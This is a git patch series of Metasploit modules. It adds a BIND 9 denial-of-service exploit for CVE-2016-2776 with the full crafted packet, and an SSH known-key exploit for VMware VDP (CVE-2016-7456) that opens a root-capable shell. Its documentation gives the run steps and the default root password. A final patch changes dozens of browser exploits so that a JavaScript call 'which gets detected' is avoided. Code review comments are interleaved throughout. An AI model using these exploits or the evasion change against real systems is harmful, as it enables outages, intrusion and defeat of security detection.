From 143a4af73de8e916de8c125ca132be43e9c3c5a3 Mon Sep 17 00:00:00 2001 From: Ale Date: Thu, 29 Sep 2016 22:14:13 -0300 Subject: [PATCH 001/883] DoS exploit for CVE-2016-2776 --- modules/auxiliary/dos/dns/namedown.rb | 166 ++++++++++++++++++++++++++ 1 file changed, 166 insertions(+) create mode 100755 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb new file mode 100755 index 0000000000..924eb8de83 --- /dev/null +++ b/modules/auxiliary/dos/dns/namedown.rb 
@@ -0,0 +1,166 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'timeout' +require 'socket' + +class MetasploitModule < Msf::Auxiliary + + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + include Msf::Auxiliary::Report + + def initialize(info={}) + super(update_info(info, + 'Name' => 'BIND 9 DoS CVE-2016-2776', + 'Description' => %q{ + Denial of Service Bind 9 DNS Server CVE-2016-2776. + Critical error condition which can occur when a nameserver is constructing a response. + A defect in the rendering of messages into packets can cause named to exit with an + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed + to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-2776' ], + [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] + ], + 'DisclosureDate' => '2016-09-27' + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def scanner_prescan(batch) + puts ''' + .... + ,.... + ..........7 + 7...............7 + ........ 7.. + .I I. + ., + ~...., 7.. I. + .................... + ......................7 + ........................I + ........................ + .......................... + .......................... + =........................... + ............................ + ............................ + +.........................., + ..........................7 + :......................... + ........................ 
+ +...................., + 7..................7 + 7~............:7 + 7+,,+777 + ''' + datastore['ScannerRecvWindow'] = 0 + end + + def checkServerStatus(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(validQuery, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end + + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end + end + + def scan_host(ip) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + checkServerStatus(ip, rport) + end + + def getDomain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + getDomain = domain+org + end + + def payload + + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x01" # Additional RRs: 1 + + # Doman Name + query += getDomain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001) + + # Aditional records. 
Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query += "\x00" + + query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query += "\x00\xff" # Class: ANY (0x00ff) + query += "\x00\x00\x00\x00" # Time to live: 0 + query += "\x00\xfc" # Data length: 252 + + # Algorithm Name + query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query += "\x00" + + # Rest of TSIG + query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query += "\x01\x2c" # Fudge: 300 + query += "\x00\x10" # MAC Size: 16 + query += Rex::Text.rand_text_alphanumeric(16) # MAC + query += "\x8f\x65" # Original Id: 36709 + query += "\x00\x00" # Error: No error (0) + query += "\x00\x00" # Other len: 0 + end + + def validQuery + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query += "\x00\x00" # Flags: 0x0000 Standard query + query += "\x00\x01" # Questions: 1 + query += "\x00\x00" # Answer RRs: 0 + query += "\x00\x00" # Authority RRs: 0 + query += "\x00\x00" # Additional RRs: 0 + + # Doman Name + query += getDomain # Random DNS Name + query += "\x00" # [End of name] + query += "\x00\x01" # Type: A (Host Address) (1) + query += "\x00\x01" # Class: IN (0x0001)s + end + +end + From c699c7c5064c6d9bc7a25c27a2abf2998a479296 Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 13:42:30 -0300 Subject: [PATCH 002/883] Fixing MSF Code Style --- modules/auxiliary/dos/dns/namedown.rb | 71 ++++++++------------------- 1 file changed, 21 insertions(+), 50 deletions(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 924eb8de83..1ac4ca0026 100755 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb 
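Review bot: checkServerStatus creates a `UDPSocket` and never closes it, so every host scanned leaks a descriptor for the life of the process; close it on every path, e.g. end the block as `rescue Timeout::Error; ensure; sudp.close; end`. The verdict logic also deserves a caveat in the output text: a `Timeout::Error` on the follow-up query is printed as "Exploit Success", so a host that simply filters or drops UDP/53 is reported the same way as a crashed named — a `print_warning` wording that says the result is unconfirmed would be more honest than `print_good`. Two things in this file are dead: `SRC_ADDR` is registered but never referenced, and `@flag_success` is assigned in scan_host but never read. The same unclosed socket is carried through unchanged by the reindent in PATCH 002 and the snake_case rename in PATCH 004.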
@@ -34,7 +34,10 @@ class MetasploitModule < Msf::Auxiliary [ 'CVE', '2016-2776' ], [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] ], - 'DisclosureDate' => '2016-09-27' + 'DisclosureDate' => 'Sep 27 2016', + { + 'ScannerRecvWindow' => 0 + } )) register_options([ 
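Review bot: The bare `{ 'ScannerRecvWindow' => 0 }` added after the `'DisclosureDate'` pair appears to be a positional hash following `key => value` arguments inside the same call, which Ruby rejects at parse time, so the module cannot load at this commit. The next patch in the series repairs it as `'DefaultOptions' => {'ScannerRecvWindow' => 0}`; the two commits should be squashed so no revision in history ships an unloadable module.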
@@ -45,70 +48,38 @@ class MetasploitModule < Msf::Auxiliary deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end - def scanner_prescan(batch) - puts ''' - .... - ,.... - ..........7 - 7...............7 - ........ 7.. - .I I. - ., - ~...., 7.. I. - .................... - ......................7 - ........................I - ........................ - .......................... - .......................... - =........................... - ............................ - ............................ - +.........................., - ..........................7 - :......................... - ........................ - +...................., - 7..................7 - 7~............:7 - 7+,,+777 - ''' - datastore['ScannerRecvWindow'] = 0 - end - def checkServerStatus(ip, rport) res = "" sudp = UDPSocket.new - sudp.send(validQuery, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end + sudp.send(validQuery, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end - if(res.length==0) - print_good("Exploit Success (Maybe, nameserver did not replied)") - else - print_error("Exploit Failed") - end + if(res.length==0) + print_good("Exploit Success (Maybe, nameserver did not replied)") + else + print_error("Exploit Failed") + end end def scan_host(ip) @flag_success = true print_status("Sending bombita (Specially crafted udp packet) to: "+ip) scanner_send(payload, ip, rport) - checkServerStatus(ip, rport) + checkServerStatus(ip, rport) end def getDomain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - getDomain = domain+org + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + getDomain = domain+org end def payload - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # 
Questions: 1 @@ -125,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" + query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) From bd96380d1904944289921efa5b8815b1ab8cf8bc Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 13:50:58 -0300 Subject: [PATCH 003/883] Fix in ScannerRecvWindow Declaration --- modules/auxiliary/dos/dns/namedown.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 1ac4ca0026..3ec6dff519 100755 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb @@ -35,9 +35,7 @@ class MetasploitModule < Msf::Auxiliary [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', - { - 'ScannerRecvWindow' => 0 - } + 'DefaultOptions' => {'ScannerRecvWindow' => 0} )) register_options([ From 066df5f1a96acda16fc285c3c52528604d749b8c Mon Sep 17 00:00:00 2001 From: Ale Date: Fri, 30 Sep 2016 14:19:43 -0300 Subject: [PATCH 004/883] Fix msftidy warnings --- modules/auxiliary/dos/dns/namedown.rb | 64 +++++++++++++-------------- 1 file changed, 32 insertions(+), 32 deletions(-) mode change 100755 => 100644 modules/auxiliary/dos/dns/namedown.rb diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb old mode 100755 new mode 100644 index 3ec6dff519..4064407d42 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb 
@@ -8,12 +8,12 @@ require 'timeout' require 'socket' class MetasploitModule < Msf::Auxiliary - + include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Dos include Msf::Auxiliary::Report - + def initialize(info={}) super(update_info(info, 'Name' => 'BIND 9 DoS CVE-2016-2776', @@ -21,13 +21,13 @@ class MetasploitModule < Msf::Auxiliary Denial of Service Bind 9 DNS Server CVE-2016-2776. Critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an - assertion failure in buffer.c while constructing a response to a query that meets certain criteria. - - This assertion can be triggered even if the apparent source address isnt allowed + assertion failure in buffer.c while constructing a response to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address isnt allowed to make queries. }, # Research and Original PoC - msf module author - 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], + 'Author' => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'], 'License' => MSF_LICENSE, 'References' => [ 
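Review bot: The `@@ -21` hunk rewrites the description lines only to trim trailing whitespace but leaves the typo `isnt` on a line it is already replacing; change it to `This assertion can be triggered even if the apparent source address isn't allowed`. The `# Doman Name` and `# Aditional records. Name` comments that appear as context in this patch's `@@ -86` hunk would benefit from the same pass.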
@@ -42,22 +42,22 @@ class MetasploitModule < Msf::Auxiliary Opt::RPORT(53), OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) ]) - + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') end - def checkServerStatus(ip, rport) - res = "" - sudp = UDPSocket.new - sudp.send(validQuery, 0, ip, rport) - begin - Timeout.timeout(5) do - res = sudp.recv(100) - end - rescue Timeout::Error - end + def check_server_status(ip, rport) + res = "" + sudp = UDPSocket.new + sudp.send(valid_query, 0, ip, rport) + begin + Timeout.timeout(5) do + res = sudp.recv(100) + end + rescue Timeout::Error + end - if(res.length==0) + if(res.length==0) print_good("Exploit Success (Maybe, nameserver did not replied)") else print_error("Exploit Failed") @@ -65,16 +65,16 @@ class MetasploitModule < Msf::Auxiliary end def scan_host(ip) - @flag_success = true - print_status("Sending bombita (Specially crafted udp packet) to: "+ip) - scanner_send(payload, ip, rport) - checkServerStatus(ip, rport) + @flag_success = true + print_status("Sending bombita (Specially crafted udp packet) to: "+ip) + scanner_send(payload, ip, rport) + check_server_status(ip, rport) end - def getDomain - domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) - org = "\x03"+Rex::Text.rand_text_alphanumeric(3) - getDomain = domain+org + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + get_domain = domain+org end def payload 
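Review bot: In the renamed `get_domain`, `get_domain = domain+org` assigns a local variable named after the method purely so the value becomes the last expression; `domain + org` on its own is the return value and avoids the confusing shadowing. In the same hunk, `if(res.length==0)` in check_server_status reads more naturally as `if res.empty?`.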
@@ -86,15 +86,15 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x01" # Additional RRs: 1 # Doman Name - query += getDomain # Random DNS Name + query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001) - + # Aditional records. Name query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes query += "\x3d"+Rex::Text.rand_text_alphanumeric(61) - query += "\x00" + query += "\x00" query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250) query += "\x00\xff" # Class: ANY (0x00ff) @@ -116,8 +116,8 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x00" # Other len: 0 end - def validQuery - query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + def valid_query + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 query += "\x00\x00" # Flags: 0x0000 Standard query query += "\x00\x01" # Questions: 1 query += "\x00\x00" # Answer RRs: 0 @@ -125,7 +125,7 @@ class MetasploitModule < Msf::Auxiliary query += "\x00\x00" # Additional RRs: 0 # Doman Name - query += getDomain # Random DNS Name + query += get_domain # Random DNS Name query += "\x00" # [End of name] query += "\x00\x01" # Type: A (Host Address) (1) query += "\x00\x01" # Class: IN (0x0001)s From c4c133dff835e9baeed20110e726ee2bd8ccfc92 Mon Sep 17 00:00:00 2001 From: Ale Date: Mon, 3 Oct 2016 17:11:04 -0300 Subject: [PATCH 005/883] Fix Web URL --- modules/auxiliary/dos/dns/namedown.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/dns/namedown.rb b/modules/auxiliary/dos/dns/namedown.rb index 4064407d42..2a8e2b521c 100644 --- a/modules/auxiliary/dos/dns/namedown.rb +++ b/modules/auxiliary/dos/dns/namedown.rb 
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary 'References' => [ [ 'CVE', '2016-2776' ], - [ 'URL', 'http://blog.infobytesec.com/2016/09/a-tale-of-packet-cve-2016-2776.html' ] + [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ] ], 'DisclosureDate' => 'Sep 27 2016', 'DefaultOptions' => {'ScannerRecvWindow' => 0} From 589084896a4a8bf23197680520f5f41d30947e8f Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 03:36:49 -0500 Subject: [PATCH 006/883] initial version of CVE-2016-7456 exploit --- .../linux/ssh/vmware_vdp_known_privkey.rb | 167 ++++++++++++++++++ 1 file changed, 167 insertions(+) create mode 100644 modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb new file mode 100644 index 0000000000..a0c2a5de1c --- /dev/null +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb 
@@ -0,0 +1,167 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'net/ssh' + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::SSH + + def initialize(info = {}) + super(update_info(info, { + 'Name' => 'VMware VDP known SSH Key', + 'Description' => %q{ + VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => true, + 'Targets' => [ [ "Universal", {} ] ], + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + 'Author' => ['phroxvs'], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-7456' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + ], + 'DisclosureDate' => "Dec 20 2016", + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DefaultTarget' => 0 + })) + + register_options( + [ + # Since we don't include Tcp, we have to register this manually + Opt::RHOST(), + Opt::RPORT(22) + ], self.class + ) + + register_advanced_options( + [ + OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), + OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) + ] + ) + + end + + # helper methods that normally come from Tcp + def rhost + datastore['RHOST'] + end + def rport + datastore['RPORT'] + end + + def do_login() + factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies']) + opt_hash = { + auth_methods: ['publickey'], + port: rport, + key_data: [ key_data ], + use_agent: false, + config: false, + proxy: factory, + non_interactive: true + } + opt_hash.merge!(:verbose => :debug) if 
datastore['SSH_DEBUG'] + begin + ssh_socket = nil + ::Timeout.timeout(datastore['SSH_TIMEOUT']) do + ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash) + end + rescue Rex::ConnectionError + return + rescue Net::SSH::Disconnect, ::EOFError + print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" + return + rescue ::Timeout::Error + print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" + return + rescue Net::SSH::AuthenticationFailed + print_error "#{rhost}:#{rport} SSH - Failed authentication" + rescue Net::SSH::Exception => e + print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" + return + end + + if ssh_socket + + # Create a new session from the socket, then dump it. + conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + self.sockets.delete(ssh_socket.transport.socket) + + return conn + else + return false + end + end + + def exploit + conn = do_login() + if conn + print_good "Successful login" + + service_data = { + address: rhost, + port: rport, + protocol: 'tcp', + service_name: 'ssh', + workspace_id: myworkspace_id, + } + credential_data = { + username: 'admin', + private_type: :ssh_key, + private_data: key_data, + origin_type: :service, + module_fullname: fullname, + }.merge(service_data) + + core = create_credential(credential_data) + login_data = { + core: core, + last_attempted: Time.now, + }.merge(service_data) + + create_credential_login(login_data) + + handler(conn.lsock) + end + end + + def key_data + < Date: Tue, 3 Jan 2017 03:39:22 -0500 Subject: [PATCH 007/883] initial version of CVE-2016-7456 exploit --- modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a0c2a5de1c..3bb5a3dd05 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb 
+++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, { - 'Name' => 'VMware VDP known SSH Key', + 'Name' => 'VMware VDP Known SSH Key', 'Description' => %q{ VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. }, @@ -34,8 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2016-7456' ], - [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], + [ 'CVE', '2016-7456' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ], ], 'DisclosureDate' => "Dec 20 2016", 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, @@ -115,8 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote conn = do_login() if conn print_good "Successful login" - - service_data = { + service_data = { address: rhost, port: rport, protocol: 'tcp', @@ -138,7 +137,6 @@ class MetasploitModule < Msf::Exploit::Remote }.merge(service_data) create_credential_login(login_data) - handler(conn.lsock) end end From a9a83bc21c76483895b53a70e158f850bd958c43 Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 06:16:07 -0500 Subject: [PATCH 008/883] fix for uninitialized constant in Net::SSH on OS X --- modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index 3bb5a3dd05..956478eadb 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb 
@@ -5,12 +5,13 @@ require 'msf/core' require 'net/ssh' - +require 'net/ssh/command_stream' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report + include Msf::Auxiliary::CommandShell include Msf::Exploit::Remote::SSH def initialize(info = {}) From a3ad3803dfc78003e7f37c155e87ebee3d9fdc59 Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 06:49:50 -0500 Subject: [PATCH 009/883] added module documentation --- .../linux/ssh/vmware_vdp_known_privkey.md | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md diff --git a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md new file mode 100644 index 0000000000..92a291bf42 --- /dev/null +++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md @@ -0,0 +1,27 @@ +## Vulnerable Application + + VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password. + +## Verification Steps + + 1. Start msfconsole + 2. Do: `use exploit/linux/ssh/vmware_vdp_known_privkey` + 3. Do: `set rhost 1.2.3.4` + 4. Do: `exploit` + 5. You should get a shell. + 6. Type: `sudo -s` to become root user + +## Scenarios + +This is a run against a known vulnerable vSphere Data Protection appliance. + +``` +msf > use exploit/linux/ssh/vmware_vdp_known_privkey +msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4 +rhost => 1.2.3.4 +msf exploit(exagrid_known_privkey) > run + +[+] Successful login +[*] Found shell. +[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100 +``` From 245a7deb67013126a44b405c7d01ce9e85500111 Mon Sep 17 00:00:00 2001 
From: phroxvs Date: Tue, 3 Jan 2017 06:51:50 -0500 Subject: [PATCH 010/883] correct copy&paste mistake in module documentation --- .../modules/exploit/linux/ssh/vmware_vdp_known_privkey.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md index 92a291bf42..3902bee5d4 100644 --- a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md +++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md @@ -19,7 +19,7 @@ This is a run against a known vulnerable vSphere Data Protection appliance. msf > use exploit/linux/ssh/vmware_vdp_known_privkey msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4 rhost => 1.2.3.4 -msf exploit(exagrid_known_privkey) > run +msf exploit(vmware_vdp_known_privkey) > run [+] Successful login [*] Found shell. From 1a4c239120ae4189cae0f4d90e24c7a2cfb32117 Mon Sep 17 00:00:00 2001 From: phroxvs Date: Tue, 3 Jan 2017 12:51:27 -0500 Subject: [PATCH 011/883] added default password of root account to documentation --- .../modules/exploit/linux/ssh/vmware_vdp_known_privkey.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md index 3902bee5d4..a464e173d8 100644 --- a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md +++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md @@ -25,3 +25,7 @@ msf exploit(vmware_vdp_known_privkey) > run [*] Found shell. [*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100 ``` + +## Further Information + +The default account of the appliance is root:changeme From 8ce10ac5916efa3f1bcd1a983ed1ad275ccefa3a Mon Sep 17 00:00:00 2001 
From: Jeff Tang Date: Wed, 22 Feb 2017 14:13:18 -0500 Subject: [PATCH 012/883] Avoid String.fromCharCode which gets detected --- modules/exploits/windows/browser/adobe_flash_rtmp.rb | 2 +- modules/exploits/windows/browser/adobe_flash_sps.rb | 2 +- .../exploits/windows/browser/adobe_flashplayer_flash10o.rb | 2 +- .../exploits/windows/browser/aladdin_choosefilepath_bof.rb | 2 +- .../exploits/windows/browser/apple_quicktime_mime_type.rb | 2 +- .../windows/browser/apple_quicktime_texml_font_table.rb | 2 +- modules/exploits/windows/browser/asus_net4switch_ipswcom.rb | 2 +- .../windows/browser/athocgov_completeinstallation.rb | 2 +- .../windows/browser/baofeng_storm_onbeforevideodownload.rb | 2 +- modules/exploits/windows/browser/chilkat_crypt_writefile.rb | 2 +- modules/exploits/windows/browser/cisco_anyconnect_exec.rb | 2 +- .../exploits/windows/browser/cisco_playerpt_setsource.rb | 2 +- .../windows/browser/cisco_playerpt_setsource_surl.rb | 2 +- modules/exploits/windows/browser/citrix_gateway_actx.rb | 2 +- .../windows/browser/crystal_reports_printcontrol.rb | 2 +- modules/exploits/windows/browser/ea_checkrequirements.rb | 2 +- modules/exploits/windows/browser/honeywell_tema_exec.rb | 2 +- .../windows/browser/hp_alm_xgo_setshapenodetype_exec.rb | 2 +- .../windows/browser/hp_loadrunner_writefilebinary.rb | 2 +- modules/exploits/windows/browser/ibm_spss_c1sizer.rb | 2 +- .../exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb | 2 +- modules/exploits/windows/browser/ibmegath_getxmlvalue.rb | 2 +- modules/exploits/windows/browser/ie_execcommand_uaf.rb | 2 +- .../windows/browser/imgeviewer_tifmergemultifiles.rb | 2 +- .../browser/indusoft_issymbol_internationalseparator.rb | 2 +- modules/exploits/windows/browser/inotes_dwa85w_bof.rb | 2 +- modules/exploits/windows/browser/intrust_annotatex_add.rb | 2 +- modules/exploits/windows/browser/mcafee_mvt_exec.rb | 2 +- .../exploits/windows/browser/mozilla_interleaved_write.rb | 2 +- 
modules/exploits/windows/browser/mozilla_reduceright.rb | 4 ++-- modules/exploits/windows/browser/ms05_054_onload.rb | 4 ++-- modules/exploits/windows/browser/ms09_043_owc_htmlurl.rb | 2 +- modules/exploits/windows/browser/ms10_018_ie_behaviors.rb | 2 +- modules/exploits/windows/browser/ms10_090_ie_css_clip.rb | 2 +- .../windows/browser/ms11_050_mshtml_cobjectelement.rb | 2 +- modules/exploits/windows/browser/ms11_081_option.rb | 2 +- modules/exploits/windows/browser/ms11_093_ole32.rb | 2 +- modules/exploits/windows/browser/ms12_004_midi.rb | 4 ++-- modules/exploits/windows/browser/ms12_037_ie_colspan.rb | 2 +- modules/exploits/windows/browser/ms12_037_same_id.rb | 2 +- .../exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb | 2 +- modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb | 6 +++--- modules/exploits/windows/browser/mswhale_checkforupdates.rb | 2 +- .../windows/browser/msxml_get_definition_code_exec.rb | 2 +- modules/exploits/windows/browser/nis2004_antispam.rb | 2 +- modules/exploits/windows/browser/notes_handler_cmdinject.rb | 2 +- .../windows/browser/novell_groupwise_gwcls1_actvx.rb | 2 +- modules/exploits/windows/browser/ntr_activex_check_bof.rb | 2 +- modules/exploits/windows/browser/ntr_activex_stopmodule.rb | 2 +- .../windows/browser/oracle_autovue_setmarkupmode.rb | 2 +- .../exploits/windows/browser/oracle_dc_submittoexpress.rb | 2 +- modules/exploits/windows/browser/pcvue_func.rb | 2 +- modules/exploits/windows/browser/quickr_qp2_bof.rb | 2 +- modules/exploits/windows/browser/realplayer_qcp.rb | 2 +- .../windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb | 2 +- .../windows/browser/samsung_security_manager_put.rb | 6 +++--- .../windows/browser/siemens_solid_edge_selistctrlx.rb | 2 +- .../windows/browser/symantec_altirisdeployment_runcmd.rb | 2 +- modules/exploits/windows/browser/teechart_pro.rb | 2 +- .../exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb | 2 +- 